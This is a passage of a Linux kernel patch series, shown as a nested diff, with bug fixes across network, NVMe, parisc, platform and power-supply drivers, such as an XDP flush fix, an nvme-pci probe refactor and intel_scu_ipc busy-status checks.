++		otx2_rcv_pkt_handler(pfvf, napi, cq, cqe, &need_xdp_flush);
+ 
+ 		cqe->hdr.cqe_type = NIX_XQE_TYPE_INVALID;
+ 		cqe->sg.seg_addr = 0x00;
+ 		processed_cqe++;
+ 		cq->pend_cqe--;
+ 	}
++	if (need_xdp_flush)
++		xdp_do_flush();
+ 
+ 	/* Free CQEs to HW */
+ 	otx2_write64(pfvf, NIX_LF_CQ_OP_DOOR,
+@@ -1323,7 +1327,8 @@ bool otx2_xdp_sq_append_pkt(struct otx2_nic *pfvf, u64 iova, int len, u16 qidx)
+ static bool otx2_xdp_rcv_pkt_handler(struct otx2_nic *pfvf,
+ 				     struct bpf_prog *prog,
+ 				     struct nix_cqe_rx_s *cqe,
+-				     struct otx2_cq_queue *cq)
++				     struct otx2_cq_queue *cq,
++				     bool *need_xdp_flush)
+ {
+ 	unsigned char *hard_start, *data;
+ 	int qidx = cq->cq_idx;
+@@ -1360,8 +1365,10 @@ static bool otx2_xdp_rcv_pkt_handler(struct otx2_nic *pfvf,
+ 
+ 		otx2_dma_unmap_page(pfvf, iova, pfvf->rbsize,
+ 				    DMA_FROM_DEVICE);
+-		if (!err)
++		if (!err) {
++			*need_xdp_flush = true;
+ 			return true;
++		}
+ 		put_page(page);
+ 		break;
+ 	default:
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.h b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+index ad8a2a4453b76..93a4258421667 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.h
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+@@ -180,6 +180,7 @@ typedef void (*ionic_desc_cb)(struct ionic_queue *q,
+ 			      struct ionic_desc_info *desc_info,
+ 			      struct ionic_cq_info *cq_info, void *cb_arg);
+ 
++#define IONIC_MAX_BUF_LEN			((u16)-1)
+ #define IONIC_PAGE_SIZE				PAGE_SIZE
+ #define IONIC_PAGE_SPLIT_SZ			(PAGE_SIZE / 2)
+ #define IONIC_PAGE_GFP_MASK			(GFP_ATOMIC | __GFP_NOWARN |\
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_txrx.c b/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
+index f8f5eb1307681..4684b9f194a68 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
+@@ -207,7 +207,8 @@ static struct sk_buff *ionic_rx_frags(struct ionic_queue *q,
+ 			return NULL;
+ 		}
+ 
+-		frag_len = min_t(u16, len, IONIC_PAGE_SIZE - buf_info->page_offset);
++		frag_len = min_t(u16, len, min_t(u32, IONIC_MAX_BUF_LEN,
++						 IONIC_PAGE_SIZE - buf_info->page_offset));
+ 		len -= frag_len;
+ 
+ 		dma_sync_single_for_cpu(dev,
+@@ -444,7 +445,8 @@ void ionic_rx_fill(struct ionic_queue *q)
+ 
+ 		/* fill main descriptor - buf[0] */
+ 		desc->addr = cpu_to_le64(buf_info->dma_addr + buf_info->page_offset);
+-		frag_len = min_t(u16, len, IONIC_PAGE_SIZE - buf_info->page_offset);
++		frag_len = min_t(u16, len, min_t(u32, IONIC_MAX_BUF_LEN,
++						 IONIC_PAGE_SIZE - buf_info->page_offset));
+ 		desc->len = cpu_to_le16(frag_len);
+ 		remain_len -= frag_len;
+ 		buf_info++;
+@@ -463,7 +465,9 @@ void ionic_rx_fill(struct ionic_queue *q)
+ 			}
+ 
+ 			sg_elem->addr = cpu_to_le64(buf_info->dma_addr + buf_info->page_offset);
+-			frag_len = min_t(u16, remain_len, IONIC_PAGE_SIZE - buf_info->page_offset);
++			frag_len = min_t(u16, remain_len, min_t(u32, IONIC_MAX_BUF_LEN,
++								IONIC_PAGE_SIZE -
++								buf_info->page_offset));
+ 			sg_elem->len = cpu_to_le16(frag_len);
+ 			remain_len -= frag_len;
+ 			buf_info++;
+diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
+index 921ca59822b0f..556b2d1cd2aca 100644
+--- a/drivers/net/team/team.c
++++ b/drivers/net/team/team.c
+@@ -2127,7 +2127,12 @@ static const struct ethtool_ops team_ethtool_ops = {
+ static void team_setup_by_port(struct net_device *dev,
+ 			       struct net_device *port_dev)
+ {
+-	dev->header_ops	= port_dev->header_ops;
++	struct team *team = netdev_priv(dev);
++
++	if (port_dev->type == ARPHRD_ETHER)
++		dev->header_ops	= team->header_ops_cache;
++	else
++		dev->header_ops	= port_dev->header_ops;
+ 	dev->type = port_dev->type;
+ 	dev->hard_header_len = port_dev->hard_header_len;
+ 	dev->needed_headroom = port_dev->needed_headroom;
+@@ -2174,8 +2179,11 @@ static int team_dev_type_check_change(struct net_device *dev,
+ 
+ static void team_setup(struct net_device *dev)
+ {
++	struct team *team = netdev_priv(dev);
++
+ 	ether_setup(dev);
+ 	dev->max_mtu = ETH_MAX_MTU;
++	team->header_ops_cache = dev->header_ops;
+ 
+ 	dev->netdev_ops = &team_netdev_ops;
+ 	dev->ethtool_ops = &team_ethtool_ops;
+diff --git a/drivers/net/thunderbolt.c b/drivers/net/thunderbolt.c
+index 6312f67f260e0..5966e36875def 100644
+--- a/drivers/net/thunderbolt.c
++++ b/drivers/net/thunderbolt.c
+@@ -1005,12 +1005,11 @@ static bool tbnet_xmit_csum_and_map(struct tbnet *net, struct sk_buff *skb,
+ 		*tucso = ~csum_tcpudp_magic(ip_hdr(skb)->saddr,
+ 					    ip_hdr(skb)->daddr, 0,
+ 					    ip_hdr(skb)->protocol, 0);
+-	} else if (skb_is_gso_v6(skb)) {
++	} else if (skb_is_gso(skb) && skb_is_gso_v6(skb)) {
+ 		tucso = dest + ((void *)&(tcp_hdr(skb)->check) - data);
+ 		*tucso = ~csum_ipv6_magic(&ipv6_hdr(skb)->saddr,
+ 					  &ipv6_hdr(skb)->daddr, 0,
+ 					  IPPROTO_TCP, 0);
+-		return false;
+ 	} else if (protocol == htons(ETH_P_IPV6)) {
+ 		tucso = dest + skb_checksum_start_offset(skb) + skb->csum_offset;
+ 		*tucso = ~csum_ipv6_magic(&ipv6_hdr(skb)->saddr,
+diff --git a/drivers/net/wireless/ath/ath11k/dp.h b/drivers/net/wireless/ath/ath11k/dp.h
+index be9eafc872b3b..232fd2e638bf6 100644
+--- a/drivers/net/wireless/ath/ath11k/dp.h
++++ b/drivers/net/wireless/ath/ath11k/dp.h
+@@ -303,12 +303,16 @@ struct ath11k_dp {
+ 
+ #define HTT_TX_WBM_COMP_STATUS_OFFSET 8
+ 
++#define HTT_INVALID_PEER_ID	0xffff
++
+ /* HTT tx completion is overlaid in wbm_release_ring */
+ #define HTT_TX_WBM_COMP_INFO0_STATUS		GENMASK(12, 9)
+ #define HTT_TX_WBM_COMP_INFO0_REINJECT_REASON	GENMASK(16, 13)
+ #define HTT_TX_WBM_COMP_INFO0_REINJECT_REASON	GENMASK(16, 13)
+ 
+ #define HTT_TX_WBM_COMP_INFO1_ACK_RSSI		GENMASK(31, 24)
++#define HTT_TX_WBM_COMP_INFO2_SW_PEER_ID	GENMASK(15, 0)
++#define HTT_TX_WBM_COMP_INFO2_VALID		BIT(21)
+ 
+ struct htt_tx_wbm_completion {
+ 	u32 info0;
+diff --git a/drivers/net/wireless/ath/ath11k/dp_tx.c b/drivers/net/wireless/ath/ath11k/dp_tx.c
+index 8afbba2369354..cd24488612454 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_tx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_tx.c
+@@ -316,10 +316,12 @@ ath11k_dp_tx_htt_tx_complete_buf(struct ath11k_base *ab,
+ 				 struct dp_tx_ring *tx_ring,
+ 				 struct ath11k_dp_htt_wbm_tx_status *ts)
+ {
++	struct ieee80211_tx_status status = { 0 };
+ 	struct sk_buff *msdu;
+ 	struct ieee80211_tx_info *info;
+ 	struct ath11k_skb_cb *skb_cb;
+ 	struct ath11k *ar;
++	struct ath11k_peer *peer;
+ 
+ 	spin_lock(&tx_ring->tx_idr_lock);
+ 	msdu = idr_remove(&tx_ring->txbuf_idr, ts->msdu_id);
+@@ -341,6 +343,11 @@ ath11k_dp_tx_htt_tx_complete_buf(struct ath11k_base *ab,
+ 
+ 	dma_unmap_single(ab->dev, skb_cb->paddr, msdu->len, DMA_TO_DEVICE);
+ 
++	if (!skb_cb->vif) {
++		ieee80211_free_txskb(ar->hw, msdu);
++		return;
++	}
++
+ 	memset(&info->status, 0, sizeof(info->status));
+ 
+ 	if (ts->acked) {
+@@ -355,7 +362,23 @@ ath11k_dp_tx_htt_tx_complete_buf(struct ath11k_base *ab,
+ 		}
+ 	}
+ 
+-	ieee80211_tx_status(ar->hw, msdu);
++	spin_lock_bh(&ab->base_lock);
++	peer = ath11k_peer_find_by_id(ab, ts->peer_id);
++	if (!peer || !peer->sta) {
++		ath11k_dbg(ab, ATH11K_DBG_DATA,
++			   "dp_tx: failed to find the peer with peer_id %d\n",
++			    ts->peer_id);
++		spin_unlock_bh(&ab->base_lock);
++		ieee80211_free_txskb(ar->hw, msdu);
++		return;
++	}
++	spin_unlock_bh(&ab->base_lock);
++
++	status.sta = peer->sta;
++	status.info = info;
++	status.skb = msdu;
++
++	ieee80211_tx_status_ext(ar->hw, &status);
+ }
+ 
+ static void
+@@ -379,7 +402,15 @@ ath11k_dp_tx_process_htt_tx_complete(struct ath11k_base *ab,
+ 		ts.msdu_id = msdu_id;
+ 		ts.ack_rssi = FIELD_GET(HTT_TX_WBM_COMP_INFO1_ACK_RSSI,
+ 					status_desc->info1);
++
++		if (FIELD_GET(HTT_TX_WBM_COMP_INFO2_VALID, status_desc->info2))
++			ts.peer_id = FIELD_GET(HTT_TX_WBM_COMP_INFO2_SW_PEER_ID,
++					       status_desc->info2);
++		else
++			ts.peer_id = HTT_INVALID_PEER_ID;
++
+ 		ath11k_dp_tx_htt_tx_complete_buf(ab, tx_ring, &ts);
++
+ 		break;
+ 	case HAL_WBM_REL_HTT_TX_COMP_STATUS_REINJ:
+ 	case HAL_WBM_REL_HTT_TX_COMP_STATUS_INSPECT:
+@@ -535,12 +566,12 @@ static void ath11k_dp_tx_complete_msdu(struct ath11k *ar,
+ 	dma_unmap_single(ab->dev, skb_cb->paddr, msdu->len, DMA_TO_DEVICE);
+ 
+ 	if (unlikely(!rcu_access_pointer(ab->pdevs_active[ar->pdev_idx]))) {
+-		dev_kfree_skb_any(msdu);
++		ieee80211_free_txskb(ar->hw, msdu);
+ 		return;
+ 	}
+ 
+ 	if (unlikely(!skb_cb->vif)) {
+-		dev_kfree_skb_any(msdu);
++		ieee80211_free_txskb(ar->hw, msdu);
+ 		return;
+ 	}
+ 
+@@ -593,7 +624,7 @@ static void ath11k_dp_tx_complete_msdu(struct ath11k *ar,
+ 			   "dp_tx: failed to find the peer with peer_id %d\n",
+ 			    ts->peer_id);
+ 		spin_unlock_bh(&ab->base_lock);
+-		dev_kfree_skb_any(msdu);
++		ieee80211_free_txskb(ar->hw, msdu);
+ 		return;
+ 	}
+ 	arsta = (struct ath11k_sta *)peer->sta->drv_priv;
+diff --git a/drivers/net/wireless/ath/ath11k/dp_tx.h b/drivers/net/wireless/ath/ath11k/dp_tx.h
+index e87d65bfbf06e..68a21ea9b9346 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_tx.h
++++ b/drivers/net/wireless/ath/ath11k/dp_tx.h
+@@ -13,6 +13,7 @@ struct ath11k_dp_htt_wbm_tx_status {
+ 	u32 msdu_id;
+ 	bool acked;
+ 	int ack_rssi;
++	u16 peer_id;
+ };
+ 
+ void ath11k_dp_tx_update_txcompl(struct ath11k *ar, struct hal_tx_status *ts);
+diff --git a/drivers/nvme/host/fc.c b/drivers/nvme/host/fc.c
+index 6c3d469eed7e3..177a365b8ec55 100644
+--- a/drivers/nvme/host/fc.c
++++ b/drivers/nvme/host/fc.c
+@@ -1911,7 +1911,7 @@ char *nvme_fc_io_getuuid(struct nvmefc_fcp_req *req)
+ 	struct nvme_fc_fcp_op *op = fcp_req_to_fcp_op(req);
+ 	struct request *rq = op->rq;
+ 
+-	if (!IS_ENABLED(CONFIG_BLK_CGROUP_FC_APPID) || !rq->bio)
++	if (!IS_ENABLED(CONFIG_BLK_CGROUP_FC_APPID) || !rq || !rq->bio)
+ 		return NULL;
+ 	return blkcg_get_fc_appid(rq->bio);
+ }
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index b30269f5e68fb..64990a2cfd0a7 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -392,14 +392,6 @@ static int nvme_pci_npages_sgl(void)
+ 			NVME_CTRL_PAGE_SIZE);
+ }
+ 
+-static size_t nvme_pci_iod_alloc_size(void)
+-{
+-	size_t npages = max(nvme_pci_npages_prp(), nvme_pci_npages_sgl());
+-
+-	return sizeof(__le64 *) * npages +
+-		sizeof(struct scatterlist) * NVME_MAX_SEGS;
+-}
+-
+ static int nvme_admin_init_hctx(struct blk_mq_hw_ctx *hctx, void *data,
+ 				unsigned int hctx_idx)
+ {
+@@ -2775,6 +2767,22 @@ static void nvme_release_prp_pools(struct nvme_dev *dev)
+ 	dma_pool_destroy(dev->prp_small_pool);
+ }
+ 
++static int nvme_pci_alloc_iod_mempool(struct nvme_dev *dev)
++{
++	size_t npages = max(nvme_pci_npages_prp(), nvme_pci_npages_sgl());
++	size_t alloc_size = sizeof(__le64 *) * npages +
++			    sizeof(struct scatterlist) * NVME_MAX_SEGS;
++
++	WARN_ON_ONCE(alloc_size > PAGE_SIZE);
++	dev->iod_mempool = mempool_create_node(1,
++			mempool_kmalloc, mempool_kfree,
++			(void *)alloc_size, GFP_KERNEL,
++			dev_to_node(dev->dev));
++	if (!dev->iod_mempool)
++		return -ENOMEM;
++	return 0;
++}
++
+ static void nvme_free_tagset(struct nvme_dev *dev)
+ {
+ 	if (dev->tagset.tags)
+@@ -2782,6 +2790,7 @@ static void nvme_free_tagset(struct nvme_dev *dev)
+ 	dev->ctrl.tagset = NULL;
+ }
+ 
++/* pairs with nvme_pci_alloc_dev */
+ static void nvme_pci_free_ctrl(struct nvme_ctrl *ctrl)
+ {
+ 	struct nvme_dev *dev = to_nvme_dev(ctrl);
+@@ -3098,20 +3107,20 @@ static void nvme_async_probe(void *data, async_cookie_t cookie)
+ 	nvme_put_ctrl(&dev->ctrl);
+ }
+ 
+-static int nvme_probe(struct pci_dev *pdev, const struct pci_device_id *id)
++static struct nvme_dev *nvme_pci_alloc_dev(struct pci_dev *pdev,
++		const struct pci_device_id *id)
+ {
+-	int node, result = -ENOMEM;
+-	struct nvme_dev *dev;
+ 	unsigned long quirks = id->driver_data;
+-	size_t alloc_size;
+-
+-	node = dev_to_node(&pdev->dev);
+-	if (node == NUMA_NO_NODE)
+-		set_dev_node(&pdev->dev, first_memory_node);
++	int node = dev_to_node(&pdev->dev);
++	struct nvme_dev *dev;
++	int ret = -ENOMEM;
+ 
+ 	dev = kzalloc_node(sizeof(*dev), GFP_KERNEL, node);
+ 	if (!dev)
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
++	INIT_WORK(&dev->ctrl.reset_work, nvme_reset_work);
++	INIT_WORK(&dev->remove_work, nvme_remove_dead_ctrl_work);
++	mutex_init(&dev->shutdown_lock);
+ 
+ 	dev->nr_write_queues = write_queues;
+ 	dev->nr_poll_queues = poll_queues;
+@@ -3119,25 +3128,11 @@ static int nvme_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	dev->queues = kcalloc_node(dev->nr_allocated_queues,
+ 			sizeof(struct nvme_queue), GFP_KERNEL, node);
+ 	if (!dev->queues)
+-		goto free;
++		goto out_free_dev;
+ 
+ 	dev->dev = get_device(&pdev->dev);
+-	pci_set_drvdata(pdev, dev);
+-
+-	result = nvme_dev_map(dev);
+-	if (result)
+-		goto put_pci;
+-
+-	INIT_WORK(&dev->ctrl.reset_work, nvme_reset_work);
+-	INIT_WORK(&dev->remove_work, nvme_remove_dead_ctrl_work);
+-	mutex_init(&dev->shutdown_lock);
+-
+-	result = nvme_setup_prp_pools(dev);
+-	if (result)
+-		goto unmap;
+ 
+ 	quirks |= check_vendor_combination_bug(pdev);
+-
+ 	if (!noacpi && acpi_storage_d3(&pdev->dev)) {
+ 		/*
+ 		 * Some systems use a bios work around to ask for D3 on
+@@ -3147,46 +3142,54 @@ static int nvme_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 			 "platform quirk: setting simple suspend\n");
+ 		quirks |= NVME_QUIRK_SIMPLE_SUSPEND;
+ 	}
++	ret = nvme_init_ctrl(&dev->ctrl, &pdev->dev, &nvme_pci_ctrl_ops,
++			     quirks);
++	if (ret)
++		goto out_put_device;
++	return dev;
+ 
+-	/*
+-	 * Double check that our mempool alloc size will cover the biggest
+-	 * command we support.
+-	 */
+-	alloc_size = nvme_pci_iod_alloc_size();
+-	WARN_ON_ONCE(alloc_size > PAGE_SIZE);
++out_put_device:
++	put_device(dev->dev);
++	kfree(dev->queues);
++out_free_dev:
++	kfree(dev);
++	return ERR_PTR(ret);
++}
+ 
+-	dev->iod_mempool = mempool_create_node(1, mempool_kmalloc,
+-						mempool_kfree,
+-						(void *) alloc_size,
+-						GFP_KERNEL, node);
+-	if (!dev->iod_mempool) {
+-		result = -ENOMEM;
+-		goto release_pools;
+-	}
++static int nvme_probe(struct pci_dev *pdev, const struct pci_device_id *id)
++{
++	struct nvme_dev *dev;
++	int result = -ENOMEM;
++
++	dev = nvme_pci_alloc_dev(pdev, id);
++	if (IS_ERR(dev))
++		return PTR_ERR(dev);
++
++	result = nvme_dev_map(dev);
++	if (result)
++		goto out_uninit_ctrl;
++
++	result = nvme_setup_prp_pools(dev);
++	if (result)
++		goto out_dev_unmap;
+ 
+-	result = nvme_init_ctrl(&dev->ctrl, &pdev->dev, &nvme_pci_ctrl_ops,
+-			quirks);
++	result = nvme_pci_alloc_iod_mempool(dev);
+ 	if (result)
+-		goto release_mempool;
++		goto out_release_prp_pools;
+ 
+ 	dev_info(dev->ctrl.device, "pci function %s\n", dev_name(&pdev->dev));
++	pci_set_drvdata(pdev, dev);
+ 
+ 	nvme_reset_ctrl(&dev->ctrl);
+ 	async_schedule(nvme_async_probe, dev);
+-
+ 	return 0;
+ 
+- release_mempool:
+-	mempool_destroy(dev->iod_mempool);
+- release_pools:
++out_release_prp_pools:
+ 	nvme_release_prp_pools(dev);
+- unmap:
++out_dev_unmap:
+ 	nvme_dev_unmap(dev);
+- put_pci:
+-	put_device(dev->dev);
+- free:
+-	kfree(dev->queues);
+-	kfree(dev);
++out_uninit_ctrl:
++	nvme_uninit_ctrl(&dev->ctrl);
+ 	return result;
+ }
+ 
+diff --git a/drivers/parisc/iosapic.c b/drivers/parisc/iosapic.c
+index bcc1dae007803..890c3c0f3d140 100644
+--- a/drivers/parisc/iosapic.c
++++ b/drivers/parisc/iosapic.c
+@@ -202,9 +202,9 @@ static inline void iosapic_write(void __iomem *iosapic, unsigned int reg, u32 va
+ 
+ static DEFINE_SPINLOCK(iosapic_lock);
+ 
+-static inline void iosapic_eoi(void __iomem *addr, unsigned int data)
++static inline void iosapic_eoi(__le32 __iomem *addr, __le32 data)
+ {
+-	__raw_writel(data, addr);
++	__raw_writel((__force u32)data, addr);
+ }
+ 
+ /*
+diff --git a/drivers/parisc/iosapic_private.h b/drivers/parisc/iosapic_private.h
+index 73ecc657ad954..bd8ff40162b4b 100644
+--- a/drivers/parisc/iosapic_private.h
++++ b/drivers/parisc/iosapic_private.h
+@@ -118,8 +118,8 @@ struct iosapic_irt {
+ struct vector_info {
+ 	struct iosapic_info *iosapic;	/* I/O SAPIC this vector is on */
+ 	struct irt_entry *irte;		/* IRT entry */
+-	u32 __iomem *eoi_addr;		/* precalculate EOI reg address */
+-	u32	eoi_data;		/* IA64: ?       PA: swapped txn_data */
++	__le32 __iomem *eoi_addr;	/* precalculate EOI reg address */
++	__le32	eoi_data;		/* IA64: ?       PA: swapped txn_data */
+ 	int	txn_irq;		/* virtual IRQ number for processor */
+ 	ulong	txn_addr;		/* IA64: id_eid  PA: partial HPA */
+ 	u32	txn_data;		/* CPU interrupt bit */
+diff --git a/drivers/platform/mellanox/Kconfig b/drivers/platform/mellanox/Kconfig
+index 30b50920b278c..f7dfa0e785fd6 100644
+--- a/drivers/platform/mellanox/Kconfig
++++ b/drivers/platform/mellanox/Kconfig
+@@ -60,6 +60,7 @@ config MLXBF_BOOTCTL
+ 	tristate "Mellanox BlueField Firmware Boot Control driver"
+ 	depends on ARM64
+ 	depends on ACPI
++	depends on NET
+ 	help
+ 	  The Mellanox BlueField firmware implements functionality to
+ 	  request swapping the primary and alternate eMMC boot partition,
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index fdf7da06af306..d85d895fee894 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -478,6 +478,15 @@ static const struct dmi_system_id asus_quirks[] = {
+ 		},
+ 		.driver_data = &quirk_asus_tablet_mode,
+ 	},
++	{
++		.callback = dmi_matched,
++		.ident = "ASUS ROG FLOW X16",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "GV601V"),
++		},
++		.driver_data = &quirk_asus_tablet_mode,
++	},
+ 	{
+ 		.callback = dmi_matched,
+ 		.ident = "ASUS VivoBook E410MA",
+diff --git a/drivers/platform/x86/intel_scu_ipc.c b/drivers/platform/x86/intel_scu_ipc.c
+index e7a3e34028178..189c5460edd81 100644
+--- a/drivers/platform/x86/intel_scu_ipc.c
++++ b/drivers/platform/x86/intel_scu_ipc.c
+@@ -19,6 +19,7 @@
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/module.h>
+ #include <linux/slab.h>
+ 
+@@ -232,19 +233,15 @@ static inline u32 ipc_data_readl(struct intel_scu_ipc_dev *scu, u32 offset)
+ /* Wait till scu status is busy */
+ static inline int busy_loop(struct intel_scu_ipc_dev *scu)
+ {
+-	unsigned long end = jiffies + IPC_TIMEOUT;
+-
+-	do {
+-		u32 status;
+-
+-		status = ipc_read_status(scu);
+-		if (!(status & IPC_STATUS_BUSY))
+-			return (status & IPC_STATUS_ERR) ? -EIO : 0;
++	u8 status;
++	int err;
+ 
+-		usleep_range(50, 100);
+-	} while (time_before(jiffies, end));
++	err = readx_poll_timeout(ipc_read_status, scu, status, !(status & IPC_STATUS_BUSY),
++				 100, jiffies_to_usecs(IPC_TIMEOUT));
++	if (err)
++		return err;
+ 
+-	return -ETIMEDOUT;
++	return (status & IPC_STATUS_ERR) ? -EIO : 0;
+ }
+ 
+ /* Wait till ipc ioc interrupt is received or timeout in 10 HZ */
+@@ -252,10 +249,12 @@ static inline int ipc_wait_for_interrupt(struct intel_scu_ipc_dev *scu)
+ {
+ 	int status;
+ 
+-	if (!wait_for_completion_timeout(&scu->cmd_complete, IPC_TIMEOUT))
+-		return -ETIMEDOUT;
++	wait_for_completion_timeout(&scu->cmd_complete, IPC_TIMEOUT);
+ 
+ 	status = ipc_read_status(scu);
++	if (status & IPC_STATUS_BUSY)
++		return -ETIMEDOUT;
++
+ 	if (status & IPC_STATUS_ERR)
+ 		return -EIO;
+ 
+@@ -267,6 +266,24 @@ static int intel_scu_ipc_check_status(struct intel_scu_ipc_dev *scu)
+ 	return scu->irq > 0 ? ipc_wait_for_interrupt(scu) : busy_loop(scu);
+ }
+ 
++static struct intel_scu_ipc_dev *intel_scu_ipc_get(struct intel_scu_ipc_dev *scu)
++{
++	u8 status;
++
++	if (!scu)
++		scu = ipcdev;
++	if (!scu)
++		return ERR_PTR(-ENODEV);
++
++	status = ipc_read_status(scu);
++	if (status & IPC_STATUS_BUSY) {
++		dev_dbg(&scu->dev, "device is busy\n");
++		return ERR_PTR(-EBUSY);
++	}
++
++	return scu;
++}
++
+ /* Read/Write power control(PMIC in Langwell, MSIC in PenWell) registers */
+ static int pwr_reg_rdwr(struct intel_scu_ipc_dev *scu, u16 *addr, u8 *data,
+ 			u32 count, u32 op, u32 id)
+@@ -280,11 +297,10 @@ static int pwr_reg_rdwr(struct intel_scu_ipc_dev *scu, u16 *addr, u8 *data,
+ 	memset(cbuf, 0, sizeof(cbuf));
+ 
+ 	mutex_lock(&ipclock);
+-	if (!scu)
+-		scu = ipcdev;
+-	if (!scu) {
++	scu = intel_scu_ipc_get(scu);
++	if (IS_ERR(scu)) {
+ 		mutex_unlock(&ipclock);
+-		return -ENODEV;
++		return PTR_ERR(scu);
+ 	}
+ 
+ 	for (nc = 0; nc < count; nc++, offset += 2) {
+@@ -439,13 +455,12 @@ int intel_scu_ipc_dev_simple_command(struct intel_scu_ipc_dev *scu, int cmd,
+ 	int err;
+ 
+ 	mutex_lock(&ipclock);
+-	if (!scu)
+-		scu = ipcdev;
+-	if (!scu) {
++	scu = intel_scu_ipc_get(scu);
++	if (IS_ERR(scu)) {
+ 		mutex_unlock(&ipclock);
+-		return -ENODEV;
++		return PTR_ERR(scu);
+ 	}
+-	scu = ipcdev;
++
+ 	cmdval = sub << 12 | cmd;
+ 	ipc_command(scu, cmdval);
+ 	err = intel_scu_ipc_check_status(scu);
+@@ -485,11 +500,10 @@ int intel_scu_ipc_dev_command_with_size(struct intel_scu_ipc_dev *scu, int cmd,
+ 		return -EINVAL;
+ 
+ 	mutex_lock(&ipclock);
+-	if (!scu)
+-		scu = ipcdev;
+-	if (!scu) {
++	scu = intel_scu_ipc_get(scu);
++	if (IS_ERR(scu)) {
+ 		mutex_unlock(&ipclock);
+-		return -ENODEV;
++		return PTR_ERR(scu);
+ 	}
+ 
+ 	memcpy(inbuf, in, inlen);
+diff --git a/drivers/power/supply/ab8500_btemp.c b/drivers/power/supply/ab8500_btemp.c
+index 6f83e99d2eb72..ce36d6ca34226 100644
+--- a/drivers/power/supply/ab8500_btemp.c
++++ b/drivers/power/supply/ab8500_btemp.c
+@@ -115,7 +115,6 @@ struct ab8500_btemp {
+ static enum power_supply_property ab8500_btemp_props[] = {
+ 	POWER_SUPPLY_PROP_PRESENT,
+ 	POWER_SUPPLY_PROP_ONLINE,
+-	POWER_SUPPLY_PROP_TECHNOLOGY,
+ 	POWER_SUPPLY_PROP_TEMP,
+ };
+ 
+@@ -532,12 +531,6 @@ static int ab8500_btemp_get_property(struct power_supply *psy,
+ 		else
+ 			val->intval = 1;
+ 		break;
+-	case POWER_SUPPLY_PROP_TECHNOLOGY:
+-		if (di->bm->bi)
+-			val->intval = di->bm->bi->technology;
+-		else
+-			val->intval = POWER_SUPPLY_TECHNOLOGY_UNKNOWN;
+-		break;
+ 	case POWER_SUPPLY_PROP_TEMP:
+ 		val->intval = ab8500_btemp_get_temp(di);
+ 		break;
+@@ -662,7 +655,7 @@ static char *supply_interface[] = {
+ 
+ static const struct power_supply_desc ab8500_btemp_desc = {
+ 	.name			= "ab8500_btemp",
+-	.type			= POWER_SUPPLY_TYPE_BATTERY,
++	.type			= POWER_SUPPLY_TYPE_UNKNOWN,
+ 	.properties		= ab8500_btemp_props,
+ 	.num_properties		= ARRAY_SIZE(ab8500_btemp_props),
+ 	.get_property		= ab8500_btemp_get_property,
+diff --git a/drivers/power/supply/ab8500_chargalg.c b/drivers/power/supply/ab8500_chargalg.c
+index ea4ad61d4c7e2..2205ea0834a61 100644
+--- a/drivers/power/supply/ab8500_chargalg.c
++++ b/drivers/power/supply/ab8500_chargalg.c
+@@ -1720,7 +1720,7 @@ static char *supply_interface[] = {
+ 
+ static const struct power_supply_desc ab8500_chargalg_desc = {
+ 	.name			= "ab8500_chargalg",
+-	.type			= POWER_SUPPLY_TYPE_BATTERY,
++	.type			= POWER_SUPPLY_TYPE_UNKNOWN,
+ 	.properties		= ab8500_chargalg_props,
+ 	.num_properties		= ARRAY_SIZE(ab8500_chargalg_props),
+ 	.get_property		= ab8500_chargalg_get_property,
+diff --git a/drivers/power/supply/mt6370-charger.c b/drivers/power/supply/mt6370-charger.c
+index f27dae5043f5b..a9641bd3d8cf8 100644
+--- a/drivers/power/supply/mt6370-charger.c
++++ b/drivers/power/supply/mt6370-charger.c
+@@ -324,7 +324,7 @@ static int mt6370_chg_toggle_cfo(struct mt6370_priv *priv)
+ 
+ 	if (fl_strobe) {
+ 		dev_err(priv->dev, "Flash led is still in strobe mode\n");
+-		return ret;
++		return -EINVAL;
+ 	}
+ 
+ 	/* cfo off */
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index f1b431aa0e4f2..c04b96edcf595 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -1058,6 +1058,13 @@ static void rk817_charging_monitor(struct work_struct *work)
+ 	queue_delayed_work(system_wq, &charger->work, msecs_to_jiffies(8000));
+ }
+ 
++static void rk817_cleanup_node(void *data)
++{
++	struct device_node *node = data;
++
++	of_node_put(node);
++}
++
+ static int rk817_charger_probe(struct platform_device *pdev)
+ {
+ 	struct rk808 *rk808 = dev_get_drvdata(pdev->dev.parent);
+@@ -1074,11 +1081,13 @@ static int rk817_charger_probe(struct platform_device *pdev)
+ 	if (!node)
+ 		return -ENODEV;
+ 
++	ret = devm_add_action_or_reset(&pdev->dev, rk817_cleanup_node, node);
++	if (ret)
++		return ret;
++
+ 	charger = devm_kzalloc(&pdev->dev, sizeof(*charger), GFP_KERNEL);
+-	if (!charger) {
+-		of_node_put(node);
++	if (!charger)
+ 		return -ENOMEM;
+-	}
+ 
+ 	charger->rk808 = rk808;
+ 
